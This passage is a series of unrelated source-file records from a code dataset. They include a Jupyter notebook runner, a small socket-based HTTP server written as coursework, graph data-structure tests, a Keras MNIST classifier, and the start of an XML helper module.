+{"seq_id":"481016384","text":"# ----------------------------------------------------------------------------\n# - Open3D: www.open3d.org -\n# ----------------------------------------------------------------------------\n# The MIT License (MIT)\n#\n# Copyright (c) 2018-2021 www.open3d.org\n#\n# Permission is hereby granted, free 
of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n# ----------------------------------------------------------------------------\n\nimport nbformat\nimport nbconvert\nfrom pathlib import Path\nimport os\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--write\", action='store_true')\n parser.add_argument(\"--break_on_failure\", action='store_true')\n args = parser.parse_args()\n\n # Setting os.environ[\"CI\"] will disable interactive (blocking) mode in\n # Jupyter notebooks\n os.environ[\"CI\"] = \"true\"\n\n file_dir = Path(__file__).absolute().parent\n\n # Note: must be consistent with make_docs.py\n example_dirs = [\n \"geometry\",\n \"core\",\n \"pipelines\",\n \"visualization\",\n ]\n nb_paths = []\n for example_dir in example_dirs:\n nb_paths += sorted((file_dir / example_dir).glob(\"*.ipynb\"))\n\n print(\"Found the following notebooks:\")\n for nb_path in nb_paths:\n print(\"> {}\".format(nb_path))\n\n for nb_path in nb_paths:\n print(\"[Executing notebook {}]\".format(nb_path.name))\n\n with open(nb_path) as f:\n nb = nbformat.read(f, as_version=4)\n ep = nbconvert.preprocessors.ExecutePreprocessor(timeout=6000)\n try:\n ep.preprocess(nb, {\"metadata\": {\"path\": nb_path.parent}})\n except nbconvert.preprocessors.execute.CellExecutionError as e:\n print(\"Execution of {} failed\".format(nb_path.name))\n if args.break_on_failure:\n raise\n\n if args.write:\n print(\"Writing the executed notebook\")\n with open(nb_path, \"w\", encoding=\"utf-8\") as f:\n nbformat.write(nb, f)\n","sub_path":"docs/jupyter/jupyter_run_all.py","file_name":"jupyter_run_all.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"226998607","text":"def solution(tickets: 'List[List[str]]') -> 'List[str]':\n answer = []\n tickets.sort(key=lambda x: x[1], reverse=True)\n route = {}\n for src, dst in tickets:\n nexts = route.setdefault(src, [])\n nexts.append(dst)\n\n def visit(airport):\n while route.get(airport):\n visit(route[airport].pop())\n answer.append(airport)\n visit('ICN')\n return answer[::-1]\n\n\nif __name__ == '__main__':\n tickets = [['ICN', 'JFK'], ['HND', 'IAD'], ['JFK', 'HND']]\n r = solution(tickets)\n print(r)\n tickets = [['ICN', 'SFO'], ['ICN', 'ATL'],\n ['SFO', 'ATL'], ['ATL', 'ICN'], ['ATL', 'SFO']]\n r = solution(tickets)\n 
print(r)\n","sub_path":"programmers/43164.py","file_name":"43164.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589970155","text":"#!/usr/bin/env python3\n# See https://docs.python.org/3.2/library/socket.html\n# for a description of python socket and its parameters\n\n#usage: python3 cuixx327_server.py\n#use python instead of python3 may cause error\n#If some special port is needed: python3 cuixx327_server.py -p portnumber\n#I have tried to modify the \"GET\" method so it can deal with binary files, in this code, you can test it by http://localhost:9001/test.jpg (I have hard code the html response so it can only correctly display with .jpg here, just a sample shows that this server can send binary data).\n#As this server actually accept \".jpg\" and \".html\", requests with other file types will get a response \"406 NOT ACCEPTABLE\"\n\n#Also, for OPTION, if a \"form.html\" doesn't exist, it can't be \"GET\" or \"POST\" or something, only if it exists, the OPTION function will give these methods.\n#Only when the folder has 666 or above permission, DELETE and PUT can be done, which means you may need to change the mode of the folder to test these functions, a default folder does not have these permissions.\n\n\n\n\nimport socket\nimport string\nimport os.path\nimport stat\nimport os\nimport urllib.parse\nimport datetime\nimport base64\n\nfrom threading import Thread\nfrom argparse import ArgumentParser\n\nBUFSIZE = 4096\n\nCRLF = '\\r\\n'\nMETHOD_NOT_ALLOWED = 'HTTP/1.1 405 METHOD NOT ALLOWED{}Allow: GET, HEAD{}{}{}'.format(CRLF, CRLF, CRLF, CRLF)\nOK = 'HTTP/1.1 200 OK{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)\nOKCLOSE = 'HTTP/1.1 200 OK{}{}{}'.format(CRLF, CRLF, CRLF)\n\nCREATED = 'HTTP/1.1 201 CREATED{}{}{}'.format(CRLF, CRLF, CRLF)\nNOT_ACCEPTABLE = 'HTTP/1.1 406 NOT ACCEPTABLE ERROR{}{}{}'.format(CRLF, CRLF, CRLF)\nNOT_ALLOWED = 'HTTP/1.1 405 METHOD NOT ALLOWED{}ALLOW: GET, POST, POST, PUT, DELETE, OPTIONS{}Connection: close{}'.format(CRLF, CRLF, CRLF)\nNOT_FOUND = 'HTTP/1.1 404 NOT FOUND{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)\nFORBIDDEN = 'HTTP/1.1 403 FORBIDDEN{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)\nBAD_REQ = 'HTTP/1.1 400 BAD REQUEST{}{}{}'.format(CRLF, CRLF, CRLF)\nMOVED_PERMANENTLY = 'HTTP/1.1 301 MOVED PERMANENTLY{}Location: https://www.cs.umn.edu/{}Connection: close{}{}'.format(CRLF, CRLF, CRLF, CRLF)\n\n\ndef get_contents(fname):\n with open(fname, 'r') as f:\n return f.read()\n\n\ndef check_perms(resource):\n \"\"\"Returns True if resource has read permissions set on 'others'\"\"\"\n stmode = os.stat(resource).st_mode\n return (getattr(stat, 'S_IROTH') & stmode) > 0\n\ndef client_talk(client_sock, client_addr):\n print('Server is talking to {}'.format(client_addr))\n recvData = client_sock.recv(BUFSIZE)\n while recvData:\n data = recvData.decode('utf-8')\n print('The request is \\r\\n{}\\r\\n' .format(data))\n dataLined = data.splitlines()\n #print('the first line is [{}]' .format(dataLined[0]))\n request = dataLined[0].split()\n put_content = dataLined[len(dataLined)-1]\n print (\"content is:\")\n print (put_content)\n if len(request) == 3:\n if request[0] == \"GET\":\n sendmsg = requestGet(request)\n elif request[0] == \"HEAD\":\n sendmsg = requestHead(request)\n elif request[0] == \"POST\":\n sendmsg = requestPost(request[2],dataLined[len(dataLined)-1])\n elif request[0] == \"PUT\":\n sendmsg = requestPut(request,put_content)\n elif request[0] == 
\"DELETE\":\n sendmsg = requestDelete(request)\n elif request[0] == \"OPTIONS\":\n sendmsg = requestOptions(request)\n elif request[0] == \"HEAD\":\n sendmsg = requestHead(request)\n else:\n sendmsg = NOT_ALLOWED\n else:\n sendmsg = ''.join([NOT_ALLOWED,\"<html><head><title>405 METHOD NOT ALLOWED\\\n
</title></head><body><h1>405 METHOD NOT ALLOWED</h1></body></html>\
\"])\n print('Response:\\n {}' .format(sendmsg))\n client_sock.send(bytes(sendmsg, 'utf-8'))\n recvData = client_sock.recv(BUFSIZE)\n\n # clean up\n client_sock.shutdown(1)\n client_sock.close()\n print('connection closed.')\n\ndef requestPut(request,put_content):\n #print (filename)\n print (\"Request is:\")\n print (request)\n #print (os.path.exists(filename[1]))\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n\n print(filenamewithpath)\n\n if (len(filename)>=2):\n getfolderpermission = cwd\n for i in range (1,len(filename)-1):\n getfolderpermission = ''.join([getfolderpermission,'/'])\n getfolderpermission = ''.join([getfolderpermission,filename[i]])\n print(getfolderpermission)\n\n\n if (bool(os.stat(getfolderpermission).st_mode & stat.S_IWOTH) and bool(os.stat(getfolderpermission).st_mode & stat.S_IROTH)):\n if(filename[len(filename)-1] == \"csumn\"):\n msg = MOVED_PERMANENTLY\n elif not bool(os.path.exists(filenamewithpath)):\n f = open(filenamewithpath,'w')\n fstr = f.write(put_content)\n f.close()\n contentmsg = ''.join(['Content-Location:', filenamewithpath])\n Createmsg = 'HTTP/1.1 201 CREATED{}{}{}Connection: close'.format(CRLF, contentmsg, CRLF)\n msg = Createmsg\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = FORBIDDEN\n else:\n f = open(filenamewithpath,'w')\n fstr = f.write(put_content)\n f.close()\n contentmsg = ''.join(['Content-Location:', filenamewithpath])\n OKmsg = 'HTTP/1.1 200 OK{}{}{}Connection: close'.format(CRLF, contentmsg, CRLF)\n msg = OKmsg\n else:\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = FORBIDDEN\n return msg\n\n\ndef requestOptions(request):\n\n currenttime = datetime.datetime.now()\n currenttime = ''.join([\"Date:\",str(currenttime)])\n\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n contentlength = len(filename[1])\n #print(filenamewithpath)\n\n #print (os.path.exists(filename[1]))\n if filename[1] == \"\" :\n AllowList = \"Allow: GET POST PUT DELETE OPTION\" \n\n\n elif(filename[len(filename)-1] == \"csumn\"):\n msg = MOVED_PERMANENTLY\n\n elif not bool(os.path.exists(filenamewithpath)):\n AllowList = \"Allow: PUT OPTION(404 Not Found)\" \n\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n AllowList = \"Allow: OPTION (403 Forbidden)\"\n\n elif (request[1].split(\".\")[1] == \"jpg\"):\n AllowList = \"Allow: GET OPTION\"\n\n elif (request[1].split(\".\")[0] == \"/calender\"):\n AllowList = \"Allow: GET OPTION DELETE\"\n\n elif (request[1].split(\".\")[0] == \"/place\"):\n AllowList = \"Allow: GET OPTION DELETE\"\n\n elif (request[1].split(\".\")[0] == \"/form\"):\n AllowList = \"Allow: GET OPTION DELETE POST\"\n\n else:\n AllowList = \"Allow: OPTION DELETE\"\n msg = 'HTTP/1.1 200 OK{}{}{}{}{}{}{}{}{}'.format(CRLF,AllowList, CRLF, \"Cache-Control: max-age=604800\",CRLF,currenttime,CRLF,\"Content-Length: \",contentlength)\n return msg\n\n\ndef requestDelete(request):\n currenttime = datetime.datetime.now()\n currenttime = ''.join([\"Date:\",str(currenttime)])\n filename = request[1].split(\"/\")\n print (len(filename))\n 
cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n\n print(filenamewithpath)\n\n if (len(filename)>=2):\n getfolderpermission = cwd\n for i in range (1,len(filename)-1):\n getfolderpermission = ''.join([getfolderpermission,'/'])\n getfolderpermission = ''.join([getfolderpermission,filename[i]])\n print(getfolderpermission)\n\n if (bool(os.stat(getfolderpermission).st_mode & stat.S_IWOTH) and bool(os.stat(getfolderpermission).st_mode & stat.S_IROTH)):\n #print (\"folder permission\")\n #print (filename)\n #print (os.path.exists(filename[1]))\n if(filename[len(filename)-1] == \"csumn\"):\n msg = MOVED_PERMANENTLY\n elif not bool(os.path.exists(filenamewithpath)):\n msg = NOT_FOUND\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = ''.join([FORBIDDEN,fstr])\n elif not (request[1].split(\".\")[1] == \"html\"):\n msg = ''.join([NOT_ACCEPTABLE,\"406 NOT ACCEPTABLE\\\n
</title></head><body><h1>406 NOT ACCEPTABLE</h1></body></html>\
\"])\n else:\n #print(\"delete\")\n os.remove(filenamewithpath)\n OKmsg = 'HTTP/1.1 200 OK{}{}{}Connection: close'.format(CRLF, currenttime, CRLF)\n msg = OKmsg\n else:\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = ''.join([FORBIDDEN,fstr])\n return msg\n \n\ndef requestGet(request):\n\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n\n print(filenamewithpath)\n \n\n\n\n #print (os.path.exists(filename[1]))\n if(filename[len(filename)-1] == \"csumn\"):\n msg = MOVED_PERMANENTLY\n elif not(os.path.exists(filenamewithpath)):\n f = open('404.html','r')\n fstr = f.read()\n f.close()\n msg = ''.join([NOT_FOUND,fstr])\n #check for 403 error: check permission\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = ''.join([FORBIDDEN,fstr])\n elif (request[1].split(\".\")[1] == \"jpg\"):\n f = open(filenamewithpath,'rb').read()\n print(type(f))\n f64 = base64.b64encode(f)\n fformat = str(f64,'utf-8')\n fstr = '''\n \n Binary Picture\n \n
<h1>Picture Test</h1>\n    <img src="data:image/jpg;base64,{}" />
\n \n \n \n '''.format(fformat)\n msg = ''.join([OK,fstr])\n elif not(filenamewithpath.split(\".\")[1] == \"html\"):\n msg = ''.join([NOT_ACCEPTABLE,\"406 NOT ACCEPTABLE\\\n
</title></head><body><h1>406 NOT ACCEPTABLE</h1></body></html>\
\"])\n else:\n f = open(filenamewithpath,'r')\n fstr = f.read()\n f.close()\n msg = ''.join([OK,fstr])\n return msg\n\ndef requestPost(protocal,request):\n print (request)\n postSplit = request.split(\"=\")\n placeNameSplit = postSplit[1].split(\"&\")\n placeName = placeNameSplit[0].replace(\"+\",\" \")\n Line1Split = postSplit[2].split(\"&\")\n Line1 = Line1Split[0].replace(\"+\",\" \")\n Line2Split = postSplit[3].split(\"&\")\n Line2 = Line2Split[0].replace(\"+\",\" \")\n openTimeSplit = postSplit[4].split(\"&\")\n openTime = ''.join([openTimeSplit[0].split(\"%\")[0],\":\",openTimeSplit[0].split(\"A\")[1]])\n closeTimeSplit = postSplit[5].split(\"&\")\n closeTime = ''.join([closeTimeSplit[0].split(\"%\")[0],\":\",closeTimeSplit[0].split(\"A\")[1]])\n AddSplit = postSplit[6].split(\"&\")\n Add = AddSplit[0].replace(\"+\",\" \")\n #URL = postSplit[7]\n #print('Posted information: event:{}\\nstart:{}\\nend:{}\\nlocation:{}\\nday:{}\\n' .format(eventName,startTime,endTime,location,day))\n submitTable = ''.join([\" Submit information\\\n
</title></head><body>\
<h1>Following Form Data Submitted Successfully:</h1>\
<table border=1>\
<tr><td>Place name:</td><td>",placeName,"</td></tr>\
<tr><td>Address Line 1:</td><td>",Line1,"</td></tr>\
<tr><td>Address Line 2:</td><td>",Line2,"</td></tr>\
<tr><td>Open Time:</td><td>",openTime,"</td></tr>\
<tr><td>Close Time:</td><td>",closeTime,"</td></tr>\
<tr><td>Additional Information:</td><td>",Add,"</td></tr>\
</table></body></html>\
\"])\n msg = ''.join([protocal,\" 200 OK\\r\\n\\r\\n\",submitTable])\n return msg\n\ndef requestHead(request):\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n\n print(filenamewithpath)\n if(filename[len(filename)-1] == \"csumn\"):\n msg = ''.join([\"HTTP/1.1\" ,\" 301 MOVED PERMANENTLY\\r\\n\\r\\n\"])\n elif not(os.path.exists(filenamewithpath)):\n msg = ''.join([\"HTTP/1.1\",\" 404 NOT FOUND\\r\\n\\r\\n\"])\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n msg = ''.join([\"HTTP/1.1\" ,\" 403 FORBIDDEN\\r\\n\\r\\n\"])\n elif not (filenamewithpath.split(\".\")[1] == \"html\"):\n msg = ''.join([\"HTTP/1.1\" ,\" 406 NOT ACCEPTABLE\\r\\n\\r\\n\"])\n else:\n msg = ''.join([\"HTTP/1.1\" ,\" 200 OK\\r\\n\\r\\n\\r\\n\"])\n return msg\n\n\nclass EchoServer:\n def __init__(self, host, port):\n print('listening on port {}'.format(port))\n self.host = host\n self.port = port\n\n self.setup_socket()\n\n self.accept()\n\n self.sock.shutdown()\n self.sock.close()\n\n def setup_socket(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((self.host, self.port))\n self.sock.listen(128)\n\n def accept(self):\n while True:\n (client, address) = self.sock.accept()\n print(self)\n th = Thread(target=client_talk, args=(client, address))\n th.start()\n\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('--host', type=str, default='localhost',\n help='specify a host to operate on (default: localhost)')\n parser.add_argument('-p', '--port', type=int, default=9001,\n help='specify a port to operate on (default: 9001)')\n args = parser.parse_args()\n return (args.host, args.port)\n\n\nif __name__ == '__main__':\n (host, port) = parse_args()\n EchoServer(host, port)\n","sub_path":"python-server/cuixx327_server.py","file_name":"cuixx327_server.py","file_ext":"py","file_size_in_byte":14568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114922028","text":"\"\"\"Standardized tests for Graph data structure.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport random\nimport string\nimport pytest\nfrom itertools import chain, permutations\nfrom collections import namedtuple\n\nMODULENAME = 'graph'\nCLASSNAME = 'Graph'\n\nmodule = import_module(MODULENAME)\nClassDef = getattr(module, CLASSNAME)\n\nREQ_METHODS = [\n 'nodes',\n 'edges',\n 'add_node',\n 'add_edge',\n 'del_node',\n 'del_edge',\n 'has_node',\n 'neighbors',\n 'adjacent',\n]\n\nGraphFixture = namedtuple(\n 'GraphFixture', (\n 'instance',\n 'nodes',\n 'edges',\n 'node_to_delete',\n 'edge_to_delete',\n 'not_edges',\n )\n)\n\n\ndef _make_node_edge_combos(nodes):\n \"\"\"Generate different combinations of edges for the given nodes.\"\"\"\n nodes = set(nodes)\n all_possible = set(permutations(nodes, 2))\n max_edges = len(all_possible)\n\n yield nodes, set() # No edges\n if all_possible:\n yield nodes, all_possible # All possible edges\n for _ in range(min(max_edges, 10)):\n edge_count = random.randrange(1, max_edges)\n edges = random.sample(all_possible, edge_count)\n yield nodes, set(edges)\n\n\ndef _make_graph_dict(nodes, edges):\n \"\"\"Make a dict representing the graph.\"\"\"\n dict_ = {}\n for node in nodes:\n dict_[node] = set(edge[1] for edge in edges if edge[0] == node)\n return dict_\n\n\nEDGE_CASES = [\n (),\n 
(0,),\n (0, 1),\n (1, 0),\n '',\n 'a',\n 'ab',\n 'ba',\n]\n\n# lists of ints\nINT_TEST_CASES = (random.sample(range(1000),\n random.randrange(2, 20)) for n in range(10))\n\n# strings\nSTR_TEST_CASES = (random.sample(string.printable,\n random.randrange(2, 20)) for n in range(10))\n\nTEST_CASES = chain(EDGE_CASES, INT_TEST_CASES, STR_TEST_CASES)\n\nTEST_CASES = chain(*(_make_node_edge_combos(nodes) for nodes in TEST_CASES))\n\n\n# POP = (True, False)\n\n# TEST_CASES = product(TEST_CASES, POP)\n\n\n@pytest.fixture(scope='function', params=TEST_CASES)\ndef new_graph(request):\n \"\"\"Return a new empty instance of MyQueue.\"\"\"\n nodes, edges = request.param\n\n instance = ClassDef()\n for node in nodes:\n instance.add_node(node)\n\n for edge in edges:\n instance.add_edge(*edge)\n\n try:\n node_to_delete = random.choice(list(nodes))\n except IndexError:\n node_to_delete = None\n\n try:\n edge_to_delete = random.choice(list(edges))\n except IndexError:\n edge_to_delete = None\n\n not_edges = set(permutations(nodes, 2)) - edges\n\n return GraphFixture(\n instance,\n nodes,\n edges,\n node_to_delete,\n edge_to_delete,\n not_edges,\n )\n\n\n@pytest.mark.parametrize('method', REQ_METHODS)\ndef test_has_method(method):\n \"\"\"Test that graph has all the correct methods.\"\"\"\n from graph import Graph\n assert hasattr(ClassDef(), method)\n\n\ndef test_nodes_unique(new_graph):\n \"\"\"Test that all graph's nodes are unique.\"\"\"\n nodes = new_graph.instance.nodes()\n assert len(nodes) == len(set(nodes))\n\n\ndef test_nodes(new_graph):\n \"\"\"Test that graph has all the inserted nodes.\"\"\"\n assert set(new_graph.instance.nodes()) == new_graph.nodes\n\n\ndef test_has_node(new_graph):\n \"\"\"Test that graph has all the inserted nodes.\"\"\"\n assert all([new_graph.instance.has_node(n) for n in new_graph.nodes])\n\n\ndef test_edges(new_graph):\n \"\"\"Test that graph has all the correct edges.\"\"\"\n assert set(new_graph.instance.edges()) == new_graph.edges\n\n\ndef test_neighbors_error(new_graph):\n \"\"\"Test that neighbors raises an error when given node is not in graph.\"\"\"\n val = 'nodenotingraph'\n with pytest.raises(ValueError):\n new_graph.instance.neighbors(val)\n\n\ndef test_add_new_node_no_neighbors(new_graph):\n \"\"\"Test new node added without edges is in the graph without neighbors.\"\"\"\n val = 'newnodenoneighbors'\n new_graph.instance.add_node(val)\n assert not set(new_graph.instance.neighbors(val))\n\n\ndef test_add_new_node_no_edges(new_graph):\n \"\"\"Test new node added without edges is not neighbor of any other node.\"\"\"\n val = 'newnodenoedges'\n new_graph.instance.add_node(val)\n other_neighbors = chain(*(new_graph.instance.neighbors(n)\n for n in new_graph.instance.nodes()))\n assert val not in set(other_neighbors)\n\n\ndef test_add_edge(new_graph):\n \"\"\"Check new edge is added by add_edge when not already in graph.\"\"\"\n new_nodes = ('notingraph1', 'notingraph2')\n assert new_nodes not in new_graph.instance.edges()\n new_graph.instance.add_edge(*new_nodes)\n assert new_nodes in new_graph.instance.edges()\n\n\ndef test_add_edge_adds_nodes(new_graph):\n \"\"\"Check new nodes are added by add_edge when not already in graph.\"\"\"\n new_nodes = {'notingraph1', 'notingraph2'}\n assert not new_nodes.issubset(new_graph.instance.nodes())\n new_graph.instance.add_edge(*new_nodes)\n assert new_nodes.issubset(new_graph.instance.nodes())\n\n\ndef test_del_node(new_graph):\n \"\"\"Test that a node is no longer in the graph after deletion.\"\"\"\n if 
new_graph.node_to_delete is None:\n pytest.skip()\n new_graph.instance.del_node(new_graph.node_to_delete)\n assert new_graph.node_to_delete not in new_graph.instance.nodes()\n\n\ndef test_del_node_neighbors(new_graph):\n \"\"\"Test deleted node is not a neighbor of any other node.\"\"\"\n if new_graph.node_to_delete is None:\n pytest.skip()\n new_graph.instance.del_node(new_graph.node_to_delete)\n other_neighbors = chain(*(new_graph.instance.neighbors(n)\n for n in new_graph.instance.nodes()))\n assert new_graph.node_to_delete not in set(other_neighbors)\n\n\ndef test_del_node_error(new_graph):\n \"\"\"Test that del_node raises an error when node is not in graph.\"\"\"\n val = 'nodenotingraphtodelete'\n with pytest.raises(ValueError):\n new_graph.instance.del_node(val)\n\n\ndef test_del_edge(new_graph):\n \"\"\"Test that an edge is no longer in the graph after deletion.\"\"\"\n if new_graph.edge_to_delete is None:\n pytest.skip()\n new_graph.instance.del_edge(*new_graph.edge_to_delete)\n assert new_graph.edge_to_delete not in new_graph.instance.edges()\n\n\ndef test_del_edge_neighbors(new_graph):\n \"\"\"Test that del_edge removes second node from neighbors of first node.\"\"\"\n if new_graph.edge_to_delete is None:\n pytest.skip()\n node1, node2 = new_graph.edge_to_delete\n new_graph.instance.del_edge(*new_graph.edge_to_delete)\n assert node2 not in new_graph.instance.neighbors(node1)\n\n\ndef test_del_edge_adjacent(new_graph):\n \"\"\"Test that adjacent is false after edge has been deleted.\"\"\"\n if new_graph.edge_to_delete is None:\n pytest.skip()\n new_graph.instance.del_edge(*new_graph.edge_to_delete)\n assert not new_graph.instance.adjacent(*new_graph.edge_to_delete)\n\n\ndef test_del_edge_error(new_graph):\n \"\"\"Test that del_edge raises an error when node is not in graph.\"\"\"\n edge = ('nodenotingraphtodelete1', 'nodenotingraphtodelete2')\n with pytest.raises(ValueError):\n new_graph.instance.del_edge(*edge)\n\n\ndef test_adjacent(new_graph):\n \"\"\"Test that adjacent returns expected values for connected edges.\"\"\"\n assert all([new_graph.instance.adjacent(*edge)\n for edge in new_graph.edges])\n\n\ndef test_adjacent_false(new_graph):\n \"\"\"Test that all absent edges are reported as not adjacent.\"\"\"\n if not new_graph.not_edges:\n pytest.skip()\n assert not any([new_graph.instance.adjacent(*edge)\n for edge in new_graph.not_edges])\n\n\ndef test_adjacent_error(new_graph):\n \"\"\"Test adjacent raises error when both given nodes are not in graph.\"\"\"\n val = 'totallynotingraph'\n with pytest.raises(ValueError):\n new_graph.instance.adjacent(val, val)\n\n\ndef test_adjacent_error2(new_graph):\n \"\"\"Test adjacent raises error when first node not in graph.\"\"\"\n if new_graph.node_to_delete is None:\n pytest.skip()\n val = 'totallynotingraph'\n with pytest.raises(ValueError):\n new_graph.instance.adjacent(val, new_graph.node_to_delete)\n\n\ndef test_adjacent_error3(new_graph):\n \"\"\"Test adjacent raises error when second node not in graph.\"\"\"\n if new_graph.node_to_delete is None:\n pytest.skip()\n val = 'totallynotingraph'\n with pytest.raises(ValueError):\n new_graph.instance.adjacent(new_graph.node_to_delete, val)\n","sub_path":"standard-tests/test_graph_standard.py","file_name":"test_graph_standard.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"11838547","text":"from keras import backend as K\nfrom keras.datasets import mnist\nimport matplotlib.pyplot 
as plt\nimport numpy as np\nfrom model_const_hw import Network\nimport time\nimport tensorflow as tf\nimport keras\n\ndef replace_no(labels):\n # even number -> 0, odd number -> 1\n labels[labels%2 == 0] = 0\n labels[labels%2 == 1] = 1 \n return labels\n\ndef replace_5(labels):\n # number < 5 -> 0, number >= 5 -> 1\n labels[labels < 5] = 0\n labels[labels >= 5] = 1 \n return labels\n\ndef plot_epochs(history):\n\n epochs = range(len(history.history['loss']))\n plt.figure()\n plt.xlabel('epochs')\n plt.ylabel('mean squared error')\n plt.plot( epochs , history.history['val_loss'] ,label = 'val_loss')\n plt.plot( epochs , history.history['loss'] ,label = 'train_loss')\n plt.ylim([0,0.15])\n plt.grid(which='major',color='black',linestyle='-')\n #plt.grid(which='minor',color='red',linestyle='-')\n plt.legend()\n plt.savefig('epoch_eo_class_5.png')\n #plt.show()\n\nif __name__ == \"__main__\":\n\n start = time.time()\n (train_images, train_labels), (test_images, test_labels) = np.array(mnist.load_data())\n train_labels = replace_5(train_labels)\n test_labels = replace_5(test_labels)\n train_images = train_images.reshape(train_images.shape[0], train_images.shape[1], train_images.shape[2],1)\n test_images = test_images.reshape(test_images.shape[0], test_images.shape[1], test_images.shape[2],1)\n #train_images = train_images.astype('float32')\n #test_images = test_images.astype('float32')\n #train_images /= 255\n #test_images /= 255\n \n train_labels = keras.utils.to_categorical(train_labels,2)\n test_labels = keras.utils.to_categorical(test_labels, 2)\n \n K.set_image_data_format(\"channels_last\")\n EPOCHS = 1\n channels = 1\n BATCH = 50\n \n #get_model\n height = train_images.shape[1]\n width = train_images.shape[2]\n model_ins = Network(channels,width,height)\n network = model_ins.get_model()\n \n #optimizer = tf.train.RMSPropOptimizer(0.000001)\n optimizer = tf.train.AdamOptimizer(0.00005)\n \n network.compile(loss=\"binary_crossentropy\", \n optimizer=optimizer, \n metrics=[\"acc\"])\n \n history = network.fit(train_images,\n train_labels, \n epochs = EPOCHS, \n verbose = 1,\n batch_size = BATCH,\n validation_data = (test_images, test_labels)\n )\n\n network.save('ts_5.h5' , include_optimizer = False)\n plot_epochs(history)\n\n pred = network.predict(test_images[:10])\n pred[pred < 0.5] = 0\n pred[pred >= 0.5] = 1\n\n test_images = test_images.reshape(test_images.shape[0], test_images.shape[1], test_images.shape[2])\n for i,img in enumerate(test_images[:10]):\n plt.figure()\n plt.title(pred[i,0])\n plt.imshow(img,cmap = 'gray')\n plt.savefig('5_images/' + str(i) + '.jpg')\n plt.close()\n \n end = time.time()\n print(\"time : {}[m]\".format((end - start)/60))\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"330168154","text":"#! 
/usr/bin/env python\n\nfrom __future__ import absolute_import\n\nfrom lxml import etree\nimport inspect\nimport logging\nimport re\nimport sys\n\nlogger = logging.getLogger('cwt.wps_lib.xml')\n\nSUPPORTED_CONVERSION = (str, float, bool, int, long)\n\nclass XMLError(Exception):\n pass\n\nclass Translator(object):\n \"\"\" Base translator class.\n\n This class can be used to control how property names are transformed\n to xml element/attribute names and vice versa.\n \"\"\"\n def property_to_element(self, name):\n raise NotImplementedError()\n\n def property_to_attribute(self, name):\n raise NotImplementedError()\n\n def element_to_property(self, name):\n raise NotImplementedError()\n\n def element_to_attribute(self, name):\n raise NotImplementedError()\n\nclass Attribute(object):\n \"\"\" Attribute decorator.\n\n This decorator represents an xml attribute. If attach is not specified then\n the attribute will be created on the root element.\n\n Attributes:\n namespace: A str namespace identifier.\n value_type: A type that the attribute will hold. Default: str\n required: A bool flag denoting whether the attribute is required. Default: False\n attach: A str name of the element to set the attribute on.\n \"\"\"\n def __init__(self, 